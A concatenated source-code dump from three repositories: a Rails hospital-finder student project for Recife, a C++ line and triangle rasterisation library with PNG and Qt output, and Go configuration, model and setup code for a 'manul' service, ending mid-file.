trust parameters from the scary internet, only allow the white list through. 
def hospital_params params.fetch(:hospital, {}) end end <file_sep>class Hospital < ApplicationRecord geocoded_by :address, :latitude => :nu_latitude, :longitude => :nu_longitude after_validation :geocode def address [no_logradouro, nu_endereco, no_complemento, no_bairro].compact.join(', ') end end <file_sep>require 'rails_helper' RSpec.describe "hospitals/show", type: :view do end <file_sep>Given("I clicked on the buscar button") do visit "/" click_button("Buscar") end When("The page loads") do visit "/map" end Then("I should see the map") do expect(page).to have_css '#map' end <file_sep>#3DB2B2 ~verde #818182 ~cinza #FDFCFC ~frostine/branco <file_sep>require 'rails_helper' RSpec.describe "hospitals/new", type: :view do end <file_sep>require 'rails_helper' RSpec.describe Hospital, type: :model do it "has none to begin with" do expect(Hospital.count).to eq 0 end it "has one after adding one" do Hospital.create expect(Hospital.count).to eq 1 end it "has none after one was created in a previous example" do expect(Hospital.count).to eq 0 end end <file_sep>## Histórias de Usuário ------------------------ como paciente quero encontrar o hospital mais próximo para ir até lá e realizar tratamento ------------------------ como vítima de acidente quero encontrar o hospital mais próximo que atenda emergência para ir até lá e ser atendido ------------------------ como paciente quero encontrar o hospital mais próximo que atenda plano de saúde para ir até lá e me consultar ------------------------ como usuário da aplicação quero que seja retornado um mapa para encontrar o hospital facilmente ------------------------ como usuário da aplicação quero fazer a consulta com um clique para obter o mapa rapidamente ------------------------ como usuário da aplicação quero que seja retornado um mapa para que eu possa navegar por ele ------------------------ como usuário da aplicação quero fazer a consulta com um clique para obter no mapa a região onde me encontro ------------------------ 
como usuário da aplicação quero clicar em "voltar" para que eu possa retornar a página inicial ------------------------ como usuário da aplicação quero ver um pin no mapa para poder enxergar mais facilmente a localização ------------------------ como usuário quero ver o centro no mapa aproximadamente na minha localização atual para ter uma visão global dos hospitais perto de mim <file_sep># Postmortem (Iteração 1)- MedicalHelp Período: 25/09 - 09/10 ## O que estava planejado? * Criar model hospital - <NAME> * Criar controller hospitals - <NAME> * Criar métodos no controller - Mariana Lima * Criar view com botão (link para view gmaps) - Guilherme Menge * Configurar as rotas - <NAME> * Criar view gmaps com api javascript - <NAME> * Configurar ambiente (gems para teste, bootstrap) - Mateus Maciel e Guilherme Menge * Criar testes com cucumber e rspec - <NAME> e Mateus Maciel ## O que foi feito? * View com api do google maps - Mateus Maciel * Configuração das rotas - <NAME> * Ambiente configurado (testes e bootstrap) - Mateus Maciel e Guilherme Menge * Teste cucumber (BDD) para duas HUs - <NAME> * Teste rspec para os controllers - Mateus Maciel * Criação scaffold hospital - Mariana Lima * Métodos definidos no controller - <NAME> * Tela com botão buscar - Guilherme Menge * Deployment Heroku - Mateus Maciel ## O que não foi feito? * Não foram feitos testes para as views nem para o model ## O que está planejado para a próxima iteração? * Configurar PostgreSQL - Mateus Maciel * Popular banco de dados - Mateus Maciel e Guilherme Menge * Filtrar no controller hospitais em Recife - Mariana Lima * Criar testes para funções do gmaps - <NAME> * Retirar rotas desnecessárias (criadas no scaffold) - <NAME> * Criar tabela e colunas no banco de dados - Mariana Lima * Front end da tela inicial - Guilherme Menge ## Lições aprendidas * Importância da união do grupo e do alinhamento. * Saber o que cada um está fazendo, para não deixar ninguém sobrecarregado. 
<file_sep># MedicalHelp-Recife Projeto da disciplina de Engenharia de Software (IF977), do curso de graduação em Sistemas de Informação do Centro de Informática da Universidade Federal de Pernambuco (UFPE). ## Link da aplicação no Heroku: http://medicalhelp-recife.herokuapp.com/ ## Link para o screencast da aplicação: https://collaaj.com/Video/VideoPlayback?vid=bbd7211f-9dd2-4d36-96c8-b441a18ed233 ## Equipe: * <NAME>: Desenvolvedor * <NAME>: Desenvolvedora de Testes e Product Owner * <NAME>: Gerente do Projeto e Desenvolvedor * <NAME>: Desenvolvedora ## Descrição O MedicalHelp-Recife é uma aplicação SaaS que indica hospitais ao usuário (vítima ou testemunha) baseado em sua localização e algumas informações adicionais: * Estado de saúde da vítima (emergência, consultas de rotina, etc.); * Se a vítima possui plano de saúde ou não; * Preferência do usuário por hospital particular ou público. ## Justificativa No ano de 2015, em Recife, houve 70.011 solicitações de atendimento ao SAMU, destas, 43.477 não eram de urgência. Imagine quantas dessas pessoas chamaram o Serviço de Atendimento Médico de Urgência apenas por não saber para onde ir e como prosseguir. Nossa aplicação Web surge para solucionar esse problema, com o mapeamento das unidades de saúde mais próximas do usuário filtradas por suas necessidades, e ainda, ajuda a melhorar o fluxo dos atendimentos de urgência do SAMU, por criar uma plataforma alternativa para casos específicos. Inicialmente a aplicação buscará hospitais em Recife e Região Metropolitana. <file_sep>Then("I should see the aplication logo") do expect(page).to have_css '#logo' end <file_sep>require 'rails_helper' RSpec.describe "hospitals/edit", type: :view do end <file_sep>require 'rails_helper' # This spec was generated by rspec-rails when you ran the scaffold generator. # It demonstrates how one might use RSpec to specify the controller code that # was generated by Rails when you ran the scaffold generator. 
# # It assumes that the implementation code is generated by the rails scaffold # generator. If you are using any extension libraries to generate different # controller code, this generated spec may or may not pass. # # It only uses APIs available in rails and/or rspec-rails. There are a number # of tools you can use to make these specs even more expressive, but we're # sticking to rails and rspec-rails APIs to keep things simple and stable. # # Compared to earlier versions of this generator, there is very limited use of # stubs and message expectations in this spec. Stubs are only used when there # is no simpler way to get a handle on the object needed for the example. # Message expectations are only used when there is no simpler way to specify # that an instance is receiving a specific message. # # Also compared to earlier versions of this generator, there are no longer any # expectations of assigns and templates rendered. These features have been # removed from Rails core in Rails 5, but can be added back in via the # `rails-controller-testing` gem. RSpec.describe HospitalsController, type: :controller do # This should return the minimal set of attributes required to create a valid # Hospital. As you add validations to Hospital, be sure to # adjust the attributes here as well. let(:valid_attributes) { skip("Add a hash of attributes valid for your model") } let(:invalid_attributes) { skip("Add a hash of attributes invalid for your model") } # This should return the minimal set of values that should be in the session # in order to pass any filters (e.g. authentication) defined in # HospitalsController. Be sure to keep this updated too. 
let(:valid_session) { {} } describe "GET #busca_hospitais" do subject {get :busca_hospitais} it "renders the homepage" do expect(subject).to render_template("busca_hospitais") end it 'does not render a diferent template' do expect(subject).to_not render_template("showmap") end end describe "GET #showmap" do subject {get :showmap} it "renders the map page" do expect(subject).to render_template("showmap") end it 'does not render a diferent template' do expect(subject).to_not render_template("busca_hospitais") end end end <file_sep>require 'rails_helper' RSpec.describe "hospitals/index", type: :view do end <file_sep>require 'rails_helper' RSpec.describe "Hospitals", type: :request do end
eb9c79ed7a1068a690cc8e4667209f2ad11b2f45
[ "Markdown", "Ruby" ]
34
Markdown
IF977/MedicalHelp-Recife
fc54805ed4cb584d0daf92e1a9acae708eb31d53
b70f84610dcb87dbecb3187545f3be22bc3097b2
refs/heads/master
<repo_name>botya02/java2hm1<file_sep>/src/com/company/Grandfather.java package com.company; public abstract class Grandfather { private String age; private String name; private Food food; private Outerwear outerwear; public String getAge() { return age; } public Grandfather(String mona) { } public String getName() { return name; } public Food getFood() { return food; } public Outerwear getOuterwear() { return outerwear; } public Grandfather(String age, String name, Food food, Outerwear outerwear) { this.age = age; this.name = name; this.food = food; this.outerwear = outerwear; } public final String getInfo(){ return "Age: " + getAge() + "\nName: " + getName() + "\nFood: " + getFood() + "\nOuterwear: " + getOuterwear(); } } <file_sep>/src/com/company/Mother.java package com.company; public class Mother extends Grandfather { public Mother(String age, String name, Food food, Outerwear outerwear) { super(age, name, food, outerwear); } public Mother(String age, String name) { super(name); } public Mother(String name) { super(name); } public void name(String age, String name){ } public final void name(String name){ } }
79b453fccf86aafd8ad3e12ea9b1f16f818649ff
[ "Java" ]
2
Java
botya02/java2hm1
114d1e5d7c776c3efcd361e3b6b4d067679f2fe8
bbfb1da591dae43a1697fedd0a516a09b2885e55
refs/heads/master
<file_sep>cmake_minimum_required(VERSION 3.14) project(luna) set(CMAKE_CXX_STANDARD 17) set(XLIB_SOURCES xlib/visual/canvas.cpp xlib/visual/image.cpp xlib/visual/viewer.cpp xlib/visual/writer.cpp ) add_library(xlib ${XLIB_SOURCES}) find_package(png REQUIRED) target_include_directories(xlib PRIVATE ${PNG_INCLUDE_DIRS}) set(CMAKE_AUTOMOC ON) set(CMAKE_AUTOUIC ON) find_package(Qt5 CONFIG REQUIRED Core Gui Widgets) target_link_libraries(xlib PRIVATE ${PNG_LIBRARIES} Qt5::Core Qt5::Gui Qt5::Widgets) add_executable(luna main.cpp) target_link_libraries(luna PRIVATE xlib) add_executable(test_line test/line.cpp) target_include_directories(test_line PRIVATE ./) target_link_libraries(test_line PRIVATE xlib) add_executable(test_fill test/fill.cpp) target_include_directories(test_fill PRIVATE ./) target_link_libraries(test_fill PRIVATE xlib) <file_sep># Project Luna For my study and practice. <file_sep>#ifndef XLIB__MATH__HPP #define XLIB__MATH__HPP #include <cmath> #include <cstdlib> #include "type.hpp" namespace xlib { class math { public: static inline float32 round_float32( float32 value ) { return round( value ); } static inline float64 round_float64( float64 value ) { return round( value ); } static inline int32 absolute_int32( int32 value ) { return abs( value ); } }; } #endif <file_sep>#ifndef XLIB__IMAGE__HPP #define XLIB__IMAGE__HPP #include "type.hpp" #include "pixel.hpp" namespace xlib { class image { public: ~image(); void allocate( int32 width, int32 height ); inline void set( int32 x, int32 y, const pixel& data ) { _buffer[ _width * y + x ] = data; } inline const pixel& get( int32 x, int32 y ) const { return _buffer[ _width * y + x ]; } inline int32 width () const { return _width; } inline int32 height() const { return _height; } inline const pixel* buffer() const { return _buffer; } private: pixel* _buffer = nullptr; int32 _width = 0; int32 _height = 0; }; } #endif <file_sep>#ifndef XLIB__PIXEL__HPP #define XLIB__PIXEL__HPP #include "type.hpp" namespace xlib { 
struct pixel { uint8 red; uint8 green; uint8 blue; uint8 alpha; pixel() : red( 0 ), green( 0 ), blue( 0 ), alpha( 255 ) { } pixel( uint8 r, uint8 g, uint8 b, uint8 a = 255 ) : red( r ), green( g ), blue( b ), alpha( a ) { } }; } #endif <file_sep>#ifndef XLIB__SDK__HPP #define XLIB__SDK__HPP #include "visual/canvas.hpp" #include "visual/matrix.hpp" #include "visual/viewer.hpp" #include "visual/writer.hpp" #endif <file_sep>#ifndef XLIB__WRITER__HPP #define XLIB__WRITER__HPP #include "image.hpp" namespace xlib { class writer { public: static void png( const image& data, const char* file ); }; } #endif <file_sep>#include "canvas.hpp" #include "math.hpp" #include "writer.hpp" using namespace xlib; #define absolute math::absolute_int32 #define round math::round_float64 void swap_int32( int32& a, int32& b ) { if ( a != b ) { a ^= b; b ^= a; a ^= b; } } void canvas::size( int32 width, int32 height ) { _image.allocate( width, height ); } void canvas::plot( int32 x, int32 y, const pixel& color ) { if ( 0 <= x && x < _image.width() && 0 <= y && y < _image.height() ) { _image.set( x, _image.height() - y - 1, color ); } } void canvas::line( int32 x1, int32 y1, int32 x2, int32 y2, const pixel& color ) { #if 1 this->line_bresenham( x1, y1, x2, y2, color ); #else this->line_dda( x1, y1, x2, y2, color ); #endif } void canvas::fill( int32 x1, int32 y1, int32 x2, int32 y2, int32 x3, int32 y3, const pixel& color ) { if ( y1 > y2 ) { swap_int32( x1, x2 ); swap_int32( y1, y2 ); } if ( y1 > y3 ) { swap_int32( x1, x3 ); swap_int32( y1, y3 ); } if ( y2 > y3 ) { swap_int32( x2, x3 ); swap_int32( y2, y3 ); } if ( y1 == y2 ) { if ( x1 < x2 ) { this->fill_triangle_flat_bottom( x3, y3, x1, x2, y2, color ); } else { this->fill_triangle_flat_bottom( x3, y3, x2, x1, y2, color ); } } else if ( y2 == y3 ) { if ( x2 < x3 ) { this->fill_triangle_flat_top( x1, y1, x2, x3, y2, color ); } else { this->fill_triangle_flat_top( x1, y1, x3, x2, y2, color ); } } else { auto dx31 = ( float64 )( x3 - x1 ); auto 
dy21 = ( float64 )( y2 - y1 ); auto dy31 = ( float64 )( y3 - y1 ); auto x4 = ( int32 )( round( x1 + dy21 / dy31 * dx31 ) ); if ( x2 < x4 ) { this->fill_triangle_flat_bottom( x3, y3, x2, x4, y2, color ); this->fill_triangle_flat_top ( x1, y1, x2, x4, y2, color ); } else { this->fill_triangle_flat_bottom( x3, y3, x4, x2, y2, color ); this->fill_triangle_flat_top ( x1, y1, x4, x2, y2, color ); } } } void canvas::line_bresenham( int32 x1, int32 y1, int32 x2, int32 y2, const pixel& color ) { auto dx = x2 - x1; auto dy = y2 - y1; auto adx = absolute( dx ); auto ady = absolute( dy ); auto ddx = adx * 2; auto ddy = ady * 2; auto x = x1; auto y = y1; auto tx = x1 < x2 ? 1 : -1; auto ty = y1 < y2 ? 1 : -1; if ( adx < ady ) { auto e = -ady; for ( auto i = 0; i <= ady; ++i ) { this->plot( x, y, color ); y += ty; e += ddx; if ( e > 0 ) { x += tx; e -= ddy; } } } else { auto e = -adx; for ( auto i = 0; i <= adx; ++i ) { this->plot( x, y, color ); x += tx; e += ddy; if ( e > 0 ) { y += ty; e -= ddx; } } } } void canvas::line_dda( int32 x1, int32 y1, int32 x2, int32 y2, const pixel& color ) { // Digital Differential Analyzer int32 dx = x2 - x1; int32 dy = y2 - y1; int32 steps = 0; if ( absolute( dx ) < absolute( dy ) ) { steps = absolute( dy ); } else { steps = absolute( dx ); } auto ix = ( float64 )( dx ) / ( float64 )( steps ); auto iy = ( float64 )( dy ) / ( float64 )( steps ); auto x = ( float64 )( x1 ); auto y = ( float64 )( y1 ); for ( auto i = 0; i <= steps; ++i ) { this->plot( round( x ), round( y ), color ); x += ix; y += iy; } } void canvas::fill_horizontal( int32 x1, int32 x2, int32 y, const pixel& color ) { for ( auto x = x1; x <= x2; ++x ) { this->plot( x, y, color ); } } void canvas::fill_triangle_flat_bottom( int32 xt, int32 yt, int32 x1, int32 x2, int32 yb, const pixel& color ) { auto dx_min = ( float64 )( x1 - xt ); auto dx_max = ( float64 )( x2 - xt ); auto dy = ( float64 )( yb - yt ); auto x_min = ( float64 )( x1 ); auto x_max = ( float64 )( x2 ); auto ix_min = 
dx_min / dy; auto ix_max = dx_max / dy; for ( auto y = yb; y <= yt; ++y ) { this->fill_horizontal( round( x_min ), round( x_max ), y, color ); x_min += ix_min; x_max += ix_max; } } void canvas::fill_triangle_flat_top( int32 xb, int32 yb, int32 x1, int32 x2, int32 yt, const pixel& color ) { auto dx_min = ( float64 )( x1 - xb ); auto dx_max = ( float64 )( x2 - xb ); auto dy = ( float64 )( yt - yb ); auto x_min = ( float64 )( x1 ); auto x_max = ( float64 )( x2 ); auto ix_min = dx_min / dy; auto ix_max = dx_max / dy; for ( auto y = yt; y >= 0; --y ) { this->fill_horizontal( round( x_min ), round( x_max ), y, color ); x_min -= ix_min; x_max -= ix_max; } } <file_sep>#ifndef XLIB__VIEWER__HPP #define XLIB__VIEWER__HPP namespace xlib { class canvas; class viewer { public: static void show( const canvas& object ); }; } #endif <file_sep>#ifndef XLIB__CANVAS__HPP #define XLIB__CANVAS__HPP #include "image.hpp" namespace xlib { class canvas { public: void size( int32 width, int32 height ); void plot( int32 x, int32 y, const pixel& color ); void line( int32 x1, int32 y1, int32 x2, int32 y2, const pixel& color ); void fill( int32 x1, int32 y1, int32 x2, int32 y2, int32 x3, int32 y3, const pixel& color ); inline const image& data() const { return _image; } private: void line_bresenham( int32 x1, int32 y1, int32 x2, int32 y2, const pixel& color ); void line_dda ( int32 x1, int32 y1, int32 x2, int32 y2, const pixel& color ); void fill_horizontal( int32 x1, int32 x2, int32 y, const pixel& color ); void fill_triangle_flat_bottom( int32 xt, int32 yt, int32 x1, int32 x2, int32 yb, const pixel& color ); void fill_triangle_flat_top ( int32 xb, int32 yb, int32 x1, int32 x2, int32 yt, const pixel& color ); private: image _image; }; } #endif <file_sep>#include "viewer.hpp" #include "canvas.hpp" #include <QApplication> #include <QtWidgets> using namespace xlib; void viewer::show( const canvas& object ) { int qt_argc = 0; char** qt_argv = nullptr; QApplication application( qt_argc, qt_argv ); 
QMainWindow window; QScrollArea area; QLabel label; const image& data = object.data(); auto bits = ( const uchar* )( data.buffer() ); auto width = data.width(); auto height = data.height(); auto format = QImage::Format_RGBA8888; label.setPixmap( QPixmap::fromImage( QImage( bits, width, height, format ) ) ); area.setVisible( true ); area.setWidget( &label ); area.setWidgetResizable( true ); window.setCentralWidget( &area ); window.show(); QApplication::exec(); } <file_sep>#include "writer.hpp" #include <cstdlib> #include <cstring> #include <png.h> using namespace xlib; void writer::png( const image& data, const char* file ) { auto width = data.width(); auto height = data.height(); png_image png; memset( &png, 0, ( sizeof png ) ); png.version = PNG_IMAGE_VERSION; png.format = PNG_FORMAT_RGBA; png.width = width; png.height = height; auto bytes = static_cast< png_bytep >( malloc( PNG_IMAGE_SIZE( png ) ) ); for ( auto y = 0; y < height; ++y ) { for ( auto x = 0; x < width; ++x ) { auto i = width * y + x; const auto& p = data.get( x, y ); bytes[ 4 * i ] = p.red; bytes[ 4 * i + 1 ] = p.green; bytes[ 4 * i + 2 ] = p.blue; bytes[ 4 * i + 3 ] = p.alpha; } } png_image_write_to_file( &png, file, 0, bytes, 0, nullptr ); free( bytes ); } <file_sep>#include <xlib/sdk.hpp> int main( int argc, char* argv[] ) { xlib::pixel white( 0xff, 0xff, 0xff ); xlib::canvas canvas; canvas.size( 100, 100 ); { xlib::int32 x1 = 10; xlib::int32 y1 = 30; xlib::int32 x2 = 30; xlib::int32 y2 = 10; xlib::int32 x3 = 40; xlib::int32 y3 = 50; canvas.fill( x1, y1, x2, y2, x3, y3, white ); } { xlib::int32 x1 = 80; xlib::int32 y1 = 50; xlib::int32 x2 = 70; xlib::int32 y2 = 30; xlib::int32 x3 = 50; xlib::int32 y3 = 80; canvas.fill( x1, y1, x2, y2, x3, y3, white ); } xlib::writer::png( canvas.data(), "test_fill.png" ); xlib::viewer::show( canvas ); return 0; } <file_sep>#include <xlib/sdk.hpp> int main( int argc, char* argv[] ) { xlib::pixel red ( 0xff, 0x00, 0x00 ); xlib::pixel green( 0x00, 0xff, 0x00 ); 
xlib::pixel blue ( 0x00, 0x00, 0xff ); xlib::pixel white( 0xff, 0xff, 0xff ); xlib::canvas canvas; canvas.size( 23, 23 ); xlib::int32 ox = 11; xlib::int32 oy = 11; canvas.line( 0 + ox, 0 + oy, 10 + ox, 0 + oy, red ); canvas.line( 0 + ox, 0 + oy, -10 + ox, 0 + oy, red ); canvas.line( 0 + ox, 0 + oy, 0 + ox, 10 + oy, red ); canvas.line( 0 + ox, 0 + oy, 0 + ox, -10 + oy, red ); canvas.line( 0 + ox, 0 + oy, 10 + ox, 10 + oy, green ); canvas.line( 0 + ox, 0 + oy, -10 + ox, 10 + oy, green ); canvas.line( 0 + ox, 0 + oy, 10 + ox, -10 + oy, green ); canvas.line( 0 + ox, 0 + oy, -10 + ox, -10 + oy, green ); canvas.line( 0 + ox, 0 + oy, 10 + ox, 5 + oy, blue ); canvas.line( 0 + ox, 0 + oy, -10 + ox, 5 + oy, blue ); canvas.line( 0 + ox, 0 + oy, 10 + ox, -5 + oy, blue ); canvas.line( 0 + ox, 0 + oy, -10 + ox, -5 + oy, blue ); canvas.line( 0 + ox, 0 + oy, 5 + ox, 10 + oy, white ); canvas.line( 0 + ox, 0 + oy, -5 + ox, 10 + oy, white ); canvas.line( 0 + ox, 0 + oy, 5 + ox, -10 + oy, white ); canvas.line( 0 + ox, 0 + oy, -5 + ox, -10 + oy, white ); xlib::writer::png( canvas.data(), "test_line.png" ); xlib::viewer::show( canvas ); return 0; } <file_sep>#ifndef XLIB__TYPE__HPP #define XLIB__TYPE__HPP namespace xlib { typedef unsigned char uint8; typedef unsigned int uint32; typedef int int32; typedef float float32; typedef double float64; } #endif <file_sep>#include "image.hpp" using namespace xlib; image::~image() { if ( _buffer ) { delete[] _buffer; _buffer = nullptr; } } void image::allocate( int32 width, int32 height ) { if ( width == _width && height == _height ) { return; } if ( _buffer ) { delete[] _buffer; _buffer = nullptr; } _buffer = new pixel[ width * height ]; _width = width; _height = height; }
6fce2068432180a1772db916f62293fc4985506e
[ "Markdown", "CMake", "C++" ]
16
CMake
yuezijian/luna
6305ba2a91906d5964040519601ae3857fbf7cf1
21109700b284f2320b59c9c7f19ae9acc68fbd84
refs/heads/master
<file_sep>version: '3'
services:
  mongo:
    image: mongo:3
    restart: always
    ports:
      - 33017:27017 # for debug
    volumes:
      - ./test-data/mongo:/data/db
      - ./scripts:/scripts
    environment:
      - CONTAINER=docker
    command: [ "--storageEngine", "wiredTiger", "--auth"]
  manul:
    build: ./
    ports:
      - 35000:35000
      - 35001:35001
    restart: always
    volumes:
      - ./test-data/data:/data
      - ./manul.yml.default:/etc/manul.yml
    environment:
      - CONTAINER=docker
    command: ["server", "-v"]
<file_sep>package model

import (
	pb "github.com/argcv/go-argcvapis/app/manul/project"
	"github.com/argcv/manul/client/mongo"
	"gopkg.in/mgo.v2/bson"
	"time"
)

// Project is the MongoDB representation of a manul project.
type Project struct {
	// Required: project id
	Id bson.ObjectId `bson:"_id,omitempty" json:"id"`
	// Required: project name
	Name string `bson:"name,omitempty" json:"name,omitempty"`
	// Optional: description
	Desc string `bson:"desc,omitempty" json:"desc,omitempty"`
	// Optional: per-project build/run configuration; may be nil
	// (stored with omitempty, so older documents can lack it entirely).
	Config *ProjectConfig `bson:"config,omitempty" json:"config,omitempty"`
	// Meta is NOT in using
	//Meta *structpb.Struct `bson:"meta,omitempty" json:"meta,omitempty"`
	CreateTime  time.Time `bson:"create_time,omitempty" json:"create_time,omitempty"`
	UpdatedTime time.Time `bson:"updated_time,omitempty" json:"updated_time,omitempty"`
	CreatedBy   string    `bson:"created_by,omitempty" json:"created_by"`
}

// ToPbProject converts the stored Project into its protobuf form.
// When rich is true the (optional) project configuration is included as well.
func (p *Project) ToPbProject(rich bool) (pbProject *pb.Project) {
	pbProject = &pb.Project{
		Id:   p.Id.Hex(),
		Name: p.Name,
		Desc: p.Desc,
	}
	// Config is optional (bson omitempty) and may legitimately be nil;
	// guard here to avoid a nil-pointer panic on rich conversions.
	if rich && p.Config != nil {
		pbProject.Config = p.Config.ToPbProjectConfig(rich)
	}
	return
}

// FromPbProject builds a Project from its protobuf form. Only the fields
// carried by the wire message (id, name, desc) are populated; timestamps
// and Config are left for the persistence layer to fill in.
func FromPbProject(p *pb.Project) *Project {
	return &Project{
		Id:   mongo.SafeToObjectIdOrEmpty(p.Id),
		Name: p.Name,
		Desc: p.Desc,
		//Meta: p.Meta,
	}
}
<file_sep>package shell

import (
	"fmt"
	"github.com/argcv/manul/config"
	"github.com/spf13/viper"
	"gopkg.in/abiosoft/ishell.v2"
)

// Relevant config keys (see package config):
//KeyDBMongoAddrs = "db.mongo.addrs"
//KeyDBMongoDatabase = "db.mongo.db"
//KeyDBMongoPerformAuth = "db.mongo.with_auth"
//KeyDBMongoAuthDatabase = "db.mongo.auth.db"
//KeyDBMongoAuthUser = "db.mongo.auth.user"
//KeyDBMongoAuthMechanism = "db.mongo.auth.mechanism"
//KeyDBMongoTimeoutSec = "db.mongo.timeout_sec"

// setupUpdateMongoDB interactively collects the MongoDB connection settings
// (one or more addresses, the default database, and optional auth
// credentials) and stores them into viper. It does not persist the config;
// saving is left to the caller (see AddSetup).
func (e *Env) setupUpdateMongoDB(c *ishell.Context) {
	{
		// addrs: collect at least one host:port, then optionally more
		var addrs []string
		addMongoAddr := func() {
			rtAddr := e.GetStringReplNonEmpty(c, "Type an address", "(e.g. localhost:27017) :")
			addrs = append(addrs, rtAddr)
			c.Printf("Current Addresses List: %v\n", addrs)
		}
		doContinue := true
		for doContinue {
			addMongoAddr()
			doContinue = e.ConfirmRepl(c, "Add more address? ", false)
		}
		c.Printf("Mongo Addresses: %v\n", addrs)
		viper.Set(config.KeyDBMongoAddrs, addrs)
	}
	// default database
	db := e.GetStringReplNonEmpty(c, "Type database for auth", "(e.g. admin ) :")
	viper.Set(config.KeyDBMongoDatabase, db)
	{
		// auth: only prompt for credentials when the server requires them
		if e.ConfirmRepl(c, "Does this mongo has authorization? ", true) {
			viper.Set(config.KeyDBMongoPerformAuth, true)
			// yes
			source := e.GetStringRepl(c, fmt.Sprintf("Type database for auth, '%s' if it is empty", db), "(e.g. admin ) :")
			if len(source) > 0 {
				viper.Set(config.KeyDBMongoAuthDatabase, source)
			} else {
				// nil clears the key so the config layer falls back to its default
				viper.Set(config.KeyDBMongoAuthDatabase, nil)
			}
			user := e.GetStringRepl(c, "Type username for auth, defaults to admin", "username :")
			if len(user) > 0 {
				viper.Set(config.KeyDBMongoAuthUser, user)
			} else {
				viper.Set(config.KeyDBMongoAuthUser, "admin")
			}
			pass := e.GetStringReplNonEmpty(c, "Type password for auth", "password :")
			viper.Set(config.KeyDBMongoAuthPass, pass)
			mech := e.GetStringRepl(c, "Type authorization mechanism, defaults to 'MONGODB-CR'", "mech :")
			if len(mech) > 0 {
				viper.Set(config.KeyDBMongoAuthMechanism, mech)
			} else {
				viper.Set(config.KeyDBMongoAuthMechanism, nil)
			}
		} else {
			viper.Set(config.KeyDBMongoPerformAuth, false)
		}
	}
}

// AddSetup registers the interactive "setup" command on the shell.
// It walks the operator through the MongoDB credential setup and then
// optionally persists the resulting configuration to disk.
func (e *Env) AddSetup() {
	cmd := &ishell.Cmd{
		Name: "setup",
		Help: "setup server environment (not for client side)",
		Func: func(c *ishell.Context) {
			if e.ConfirmRepl(c, "Update Mongo Credential ?", true) {
				e.setupUpdateMongoDB(c)
			} else {
				c.Println("Skipped..")
			}
			if e.ConfirmRepl(c, "Save Config ?", true) {
				// WriteConfig can fail (e.g. no config file yet, or the
				// path is not writable); report the failure instead of
				// unconditionally claiming success.
				if err := viper.WriteConfig(); err != nil {
					c.Printf("Failed to save config: %v\n", err)
				} else {
					c.Printf("Saved config file to %v\n", viper.ConfigFileUsed())
				}
			} else {
				c.Println("I did nothing and quitting....")
			}
		},
	}
	e.Sh.AddCmd(cmd)
}
<file_sep>package config const ( // RPC Section KeyRpcBind = "rpc.bind" KeyRpcHost = "rpc.host" KeyRpcPort = "rpc.port" KeyRpcOptionMaxRecvMsgSizeMB = "rpc.option.max_recv_msg_size_mb" KeyRpcOptionMaxSendMsgSizeMB = "rpc.option.max_send_msg_size_mb" KeyHttpBind = "rpc.http.bind" KeyHttpHost = "rpc.http.host" KeyHttpPort = "rpc.http.port" // Database KeyDBMongoAddrs = "db.mongo.addrs" KeyDBMongoPerformAuth = "db.mongo.with_auth" KeyDBMongoAuthDatabase = "db.mongo.auth.db" KeyDBMongoAuthUser = "db.mongo.auth.user" KeyDBMongoAuthPass = "<PASSWORD>.auth.<PASSWORD>" KeyDBMongoAuthMechanism = "db.mongo.auth.mechanism" KeyDBMongoTimeoutSec = "db.mongo.timeout_sec" KeyDBMongoDatabase = "db.mongo.db" // Client KeyClientUserName = "client.user.name" KeyClientUserSecret = "client.user.secret" //KeyClientProject = "client.project" KeyFsWorkdir = "fs.workdir" KeyMailSMTPHost = "mail.smtp.host" KeyMailSMTPPort = "mail.smtp.port" KeyMailSMTPUserSender = "mail.smtp.sender" // Sender Name, Like: Sunlab Team KeyMailSMTPPerformAuth = "mail.smtp.with_auth" KeyMailSMTPUserName = "mail.smtp.auth.user" KeyMailSMTPPassword = "<PASSWORD>" KeyMailSMTPUserDefaultFrom = "mail.smtp.default_from" KeyMailSMTPInsecureSkipVerify = "mail.smtp.insecure_skip_verify" ) <file_sep>package main import ( "github.com/argcv/manul/model" "github.com/argcv/manul/version" "github.com/argcv/webeh/log" "github.com/pkg/errors" "github.com/spf13/cobra" "github.com/spf13/viper" "os" ) func main() { viper.SetConfigName("manul.project") viper.AddConfigPath(".") if conf := os.Getenv("MANUL_PROJECT_CFG"); conf != "" { viper.SetConfigFile(conf) } cmd := &cobra.Command{ PersistentPreRunE: func(cmd *cobra.Command, args []string) error { log.Infof("Manul Loader Started. 
Version: %s (%s) Built At: %v", version.Version, version.GitHash, version.BuildDate) if verbose, err := cmd.Flags().GetBool("verbose"); err == nil { if verbose { log.Verbose() log.Debug("verbose mode: ON") } } if conf, _ := cmd.Flags().GetString("config"); conf != "" { viper.SetConfigFile(conf) } err := viper.ReadInConfig() if _, ok := err.(viper.ConfigFileNotFoundError); !ok && err != nil { return err } if conf := viper.ConfigFileUsed(); conf != "" { log.Debugf("using config file: %s", conf) } else { return errors.New("configure file not found!!") } return nil }, RunE: func(cmd *cobra.Command, args []string) error { cfg, e := model.LoadProjectConfig("manul.project.yml") if e != nil { return e } bse := cfg.ToBashScriptsExecutor() bse.Id = "j1" log.Infof("Scripts: [%s]", bse.EncodedScript()) out, err := bse.Perform() log.Infof(".... out[\n%s\n] err::[%v]", string(out), err) //envs := viper.GetStringSlice("envs") // //log.Infof("[[[[[%v]]]]]", envs) // //outputDir, _ := cmd.Flags().GetString("out") // //log.Infof("output folder: %v", outputDir) // //os.MkdirAll(outputDir, 0700) // //bse := helpers.NewBashScriptsExecutor("123") // //bse.SetEnv(envs...) //for _, stage := range stages { // log.Info("stage:", stage) // script := viper.GetString(fmt.Sprintf("jobs.%s.script", stage)) // scripts := viper.GetStringSlice(fmt.Sprintf("jobs.%s.scripts", stage)) // // bse.AddEnv(envs...) // if len(script) > 0 { // scripts = append(scripts, script) // } // bse.AddScriptsInStage(stage, scripts...) //} //log.Infof("Scripts: [%s]", bse.EncodedScript()) //out, err := bse.Perform() //log.Infof(".... 
